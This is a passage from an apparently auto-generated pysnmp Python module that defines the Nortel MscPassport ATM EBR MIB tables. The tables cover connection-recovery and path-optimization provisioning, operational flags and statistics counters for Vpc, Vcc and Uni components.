'mscAtmIfVptVccSrc', 'mscAtmIfVpcSrcIndex', 'mscAtmIfVccSrc'))
mscAtmIfVptPnniIndex, mscAtmIfPnniIndex, mscAtmIfPnni, mscAtmIfVptPnni = (
mibBuilder.importSymbols('Nortel-MsCarrier-MscPassport-AtmPnniMIB',
'mscAtmIfVptPnniIndex', 'mscAtmIfPnniIndex', 'mscAtmIfPnni',
'mscAtmIfVptPnni'))
mscAtmIfVptUni, mscAtmIfUni, mscAtmIfUniIndex, mscAtmIfVptUniIndex = (
mibBuilder.importSymbols('Nortel-MsCarrier-MscPassport-AtmUniMIB',
'mscAtmIfVptUni', 'mscAtmIfUni', 'mscAtmIfUniIndex', 'mscAtmIfVptUniIndex')
)
Counter32, DisplayString, Gauge32, StorageType, RowStatus = (mibBuilder.
importSymbols(
'Nortel-MsCarrier-MscPassport-StandardTextualConventionsMIB',
'Counter32', 'DisplayString', 'Gauge32', 'StorageType', 'RowStatus'))
NonReplicated, = mibBuilder.importSymbols(
'Nortel-MsCarrier-MscPassport-TextualConventionsMIB', 'NonReplicated')
mscPassportMIBs, = mibBuilder.importSymbols(
'Nortel-MsCarrier-MscPassport-UsefulDefinitionsMIB', 'mscPassportMIBs')
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols('SNMPv2-CONF',
'NotificationGroup', 'ModuleCompliance')
(Integer32, ObjectIdentity, ModuleIdentity, Bits, Counter32, IpAddress,
Gauge32, NotificationType, iso, MibScalar, MibTable, MibTableRow,
MibTableColumn, MibIdentifier, Unsigned32, Counter64, TimeTicks) = (
mibBuilder.importSymbols('SNMPv2-SMI', 'Integer32', 'ObjectIdentity',
'ModuleIdentity', 'Bits', 'Counter32', 'IpAddress', 'Gauge32',
'NotificationType', 'iso', 'MibScalar', 'MibTable', 'MibTableRow',
'MibTableColumn', 'MibIdentifier', 'Unsigned32', 'Counter64', 'TimeTicks'))
TextualConvention, DisplayString = mibBuilder.importSymbols('SNMPv2-TC',
'TextualConvention', 'DisplayString')
# Generated MIB object registrations (Nortel-MsCarrier-MscPassport-AtmEbrMIB).
# Root identifier of the ATM EBR MIB subtree.
atmEbrMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159))
# AtmIf/Vpc source EBR-override component: a RowStatus table (indexed by
# AtmIf, Vpc, VpcSrc and EbrOv indices) and a read-write provisioning table.
mscAtmIfVpcSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
    4, 6, 2))
mscAtmIfVpcSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 4, 6, 2, 1))
if mibBuilder.loadTexts:
    mscAtmIfVpcSrcEbrOvRowStatusTable.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 4, 6, 2, 1, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVpcIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB', 'mscAtmIfVpcSrcIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVpcSrcEbrOvIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVpcSrcEbrOvRowStatusEntry.setStatus('mandatory')
# Read-write row status column; ComponentName/StorageType are read-only.
mscAtmIfVpcSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 4, 6, 2, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVpcSrcEbrOvRowStatus.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
    36, 2, 1, 114, 4, 6, 2, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVpcSrcEbrOvComponentName.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 4, 6, 2, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVpcSrcEbrOvStorageType.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 4, 6, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
    mscAtmIfVpcSrcEbrOvIndex.setStatus('mandatory')
# Provisioning table: two yes/no (1/0) flags, both defaulting to 'yes'.
mscAtmIfVpcSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 4, 6, 2, 20))
if mibBuilder.loadTexts:
    mscAtmIfVpcSrcEbrOvProvTable.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 4, 6, 2, 20, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVpcIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB', 'mscAtmIfVpcSrcIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVpcSrcEbrOvIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVpcSrcEbrOvProvEntry.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 4, 6, 2, 20, 1, 1), Integer32().subtype(subtypeSpec
    =ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=
    NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVpcSrcEbrOvRecoverySubscribed.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4,
    1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1, 2), Integer32().subtype(
    subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(
    namedValues=NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess(
    'readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVpcSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
# AtmIf/Vpc EBR-info component: read-only operational state (subscription
# flags, recovery flag) plus Counter32 statistics. RowStatus here is
# read-only, unlike the read-write override tables above.
mscAtmIfVpcEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4,
    11))
mscAtmIfVpcEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 4, 11, 1))
if mibBuilder.loadTexts:
    mscAtmIfVpcEbrInfoRowStatusTable.setStatus('mandatory')
mscAtmIfVpcEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 4, 11, 1, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVpcIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVpcEbrInfoIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVpcEbrInfoRowStatusEntry.setStatus('mandatory')
mscAtmIfVpcEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 4, 11, 1, 1, 1), RowStatus()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVpcEbrInfoRowStatus.setStatus('mandatory')
mscAtmIfVpcEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 4, 11, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVpcEbrInfoComponentName.setStatus('mandatory')
mscAtmIfVpcEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 4, 11, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVpcEbrInfoStorageType.setStatus('mandatory')
mscAtmIfVpcEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 4, 11, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
    mscAtmIfVpcEbrInfoIndex.setStatus('mandatory')
# Operational table: three read-only yes/no (1/0) flags.
mscAtmIfVpcEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 4, 11, 30))
if mibBuilder.loadTexts:
    mscAtmIfVpcEbrInfoOperTable.setStatus('mandatory')
mscAtmIfVpcEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 4, 11, 30, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVpcIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVpcEbrInfoIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVpcEbrInfoOperEntry.setStatus('mandatory')
mscAtmIfVpcEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 4, 11, 30, 1, 1), Integer32().subtype(subtypeSpec=
    ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=
    NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVpcEbrInfoRecoverySubscribed.setStatus('mandatory')
mscAtmIfVpcEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 4, 11, 30, 1, 2), Integer32().subtype(subtypeSpec=
    ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=
    NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVpcEbrInfoOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVpcEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 4, 11, 30, 1, 3), Integer32().subtype(subtypeSpec=
    ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=
    NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVpcEbrInfoConnectionRecovered.setStatus('mandatory')
# Statistics table: Counter32 totals for recoveries and path optimizations.
mscAtmIfVpcEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 4, 11, 40))
if mibBuilder.loadTexts:
    mscAtmIfVpcEbrInfoStatsTable.setStatus('mandatory')
mscAtmIfVpcEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 4, 11, 40, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVpcIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVpcEbrInfoIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVpcEbrInfoStatsEntry.setStatus('mandatory')
mscAtmIfVpcEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4,
    1, 562, 36, 2, 1, 114, 4, 11, 40, 1, 1), Counter32()).setMaxAccess(
    'readonly')
if mibBuilder.loadTexts:
    mscAtmIfVpcEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVpcEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 4, 11, 40, 1, 2), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVpcEbrInfoTotalPathOptimizations.setStatus('mandatory')
# AtmIf/Vcc source EBR-override component: mirrors the Vpc override subtree
# above, but indexed by Vcc/VccSrc instead of Vpc/VpcSrc.
mscAtmIfVccSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
    5, 8, 2))
mscAtmIfVccSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 5, 8, 2, 1))
if mibBuilder.loadTexts:
    mscAtmIfVccSrcEbrOvRowStatusTable.setStatus('mandatory')
mscAtmIfVccSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 5, 8, 2, 1, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVccIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB', 'mscAtmIfVccSrcIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVccSrcEbrOvIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVccSrcEbrOvRowStatusEntry.setStatus('mandatory')
mscAtmIfVccSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 5, 8, 2, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVccSrcEbrOvRowStatus.setStatus('mandatory')
mscAtmIfVccSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
    36, 2, 1, 114, 5, 8, 2, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVccSrcEbrOvComponentName.setStatus('mandatory')
mscAtmIfVccSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 5, 8, 2, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVccSrcEbrOvStorageType.setStatus('mandatory')
mscAtmIfVccSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 5, 8, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
    mscAtmIfVccSrcEbrOvIndex.setStatus('mandatory')
# Provisioning table: read-write yes/no flags defaulting to 'yes'.
mscAtmIfVccSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 5, 8, 2, 20))
if mibBuilder.loadTexts:
    mscAtmIfVccSrcEbrOvProvTable.setStatus('mandatory')
mscAtmIfVccSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 5, 8, 2, 20, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVccIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB', 'mscAtmIfVccSrcIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVccSrcEbrOvIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVccSrcEbrOvProvEntry.setStatus('mandatory')
mscAtmIfVccSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 5, 8, 2, 20, 1, 1), Integer32().subtype(subtypeSpec
    =ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=
    NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')
mscAtmIfVccSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4,
    1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1, 2), Integer32().subtype(
    subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(
    namedValues=NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess(
    'readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
# AtmIf/Vcc EBR-info component: read-only operational flags and Counter32
# statistics, mirroring the Vpc EBR-info subtree but indexed by Vcc.
mscAtmIfVccEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5,
    12))
mscAtmIfVccEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 5, 12, 1))
if mibBuilder.loadTexts:
    mscAtmIfVccEbrInfoRowStatusTable.setStatus('mandatory')
mscAtmIfVccEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 5, 12, 1, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVccIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVccEbrInfoIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVccEbrInfoRowStatusEntry.setStatus('mandatory')
mscAtmIfVccEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 5, 12, 1, 1, 1), RowStatus()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVccEbrInfoRowStatus.setStatus('mandatory')
mscAtmIfVccEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 5, 12, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVccEbrInfoComponentName.setStatus('mandatory')
mscAtmIfVccEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 5, 12, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVccEbrInfoStorageType.setStatus('mandatory')
mscAtmIfVccEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 5, 12, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
    mscAtmIfVccEbrInfoIndex.setStatus('mandatory')
# Operational table: three read-only yes/no (1/0) flags.
mscAtmIfVccEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 5, 12, 30))
if mibBuilder.loadTexts:
    mscAtmIfVccEbrInfoOperTable.setStatus('mandatory')
mscAtmIfVccEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 5, 12, 30, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVccIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVccEbrInfoIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVccEbrInfoOperEntry.setStatus('mandatory')
mscAtmIfVccEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 5, 12, 30, 1, 1), Integer32().subtype(subtypeSpec=
    ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=
    NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVccEbrInfoRecoverySubscribed.setStatus('mandatory')
mscAtmIfVccEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 5, 12, 30, 1, 2), Integer32().subtype(subtypeSpec=
    ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=
    NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVccEbrInfoOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVccEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 5, 12, 30, 1, 3), Integer32().subtype(subtypeSpec=
    ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=
    NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVccEbrInfoConnectionRecovered.setStatus('mandatory')
# Statistics table: Counter32 totals for recoveries and path optimizations.
mscAtmIfVccEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 5, 12, 40))
if mibBuilder.loadTexts:
    mscAtmIfVccEbrInfoStatsTable.setStatus('mandatory')
mscAtmIfVccEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 5, 12, 40, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVccIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVccEbrInfoIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVccEbrInfoStatsEntry.setStatus('mandatory')
mscAtmIfVccEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4,
    1, 562, 36, 2, 1, 114, 5, 12, 40, 1, 1), Counter32()).setMaxAccess(
    'readonly')
if mibBuilder.loadTexts:
    mscAtmIfVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVccEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 5, 12, 40, 1, 2), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVccEbrInfoTotalPathOptimizations.setStatus('mandatory')
# AtmIf/Uni EBR component: RowStatus table, a provisioning table whose two
# columns are 1-octet fixed-length bitmask strings (default hex 'c0'), a
# read-only Gauge32 operational table, and Counter32 statistics.
mscAtmIfUniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7))
mscAtmIfUniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 6, 7, 1))
if mibBuilder.loadTexts:
    mscAtmIfUniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfUniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 6, 7, 1, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfUniIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfUniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfUniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfUniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 6, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfUniEbrRowStatus.setStatus('mandatory')
mscAtmIfUniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,
    1, 114, 6, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfUniEbrComponentName.setStatus('mandatory')
mscAtmIfUniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 6, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfUniEbrStorageType.setStatus('mandatory')
mscAtmIfUniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
    6, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
    mscAtmIfUniEbrIndex.setStatus('mandatory')
mscAtmIfUniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6,
    7, 20))
if mibBuilder.loadTexts:
    mscAtmIfUniEbrProvTable.setStatus('mandatory')
mscAtmIfUniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
    6, 7, 20, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfUniIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfUniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfUniEbrProvEntry.setStatus('mandatory')
# One-octet bitmask columns; exact bit semantics are defined by the MIB
# module text, not visible here.
mscAtmIfUniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
    36, 2, 1, 114, 6, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=
    ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')
    ).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfUniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfUniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,
    2, 1, 114, 6, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=
    ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')
    ).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfUniEbrPathOptimization.setStatus('mandatory')
# Operational table: read-only Gauge32 connection counts.
mscAtmIfUniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6,
    7, 30))
if mibBuilder.loadTexts:
    mscAtmIfUniEbrOperTable.setStatus('mandatory')
mscAtmIfUniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
    6, 7, 30, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfUniIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfUniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfUniEbrOperEntry.setStatus('mandatory')
mscAtmIfUniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562,
    36, 2, 1, 114, 6, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=
    ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfUniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfUniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4,
    1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=
    ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfUniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfUniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1,
    4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 3), Gauge32().subtype(
    subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfUniEbrIneligibleRecoveredConnections.setStatus('mandatory')
# Statistics table: Counter32 totals.
mscAtmIfUniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
    6, 7, 40))
if mibBuilder.loadTexts:
    mscAtmIfUniEbrStatsTable.setStatus('mandatory')
mscAtmIfUniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
    114, 6, 7, 40, 1)).setIndexNames((0,
    'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfUniIndex'), (0,
    'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfUniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfUniEbrStatsEntry.setStatus('mandatory')
mscAtmIfUniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 6, 7, 40, 1, 1), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfUniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfUniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,
    562, 36, 2, 1, 114, 6, 7, 40, 1, 2), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
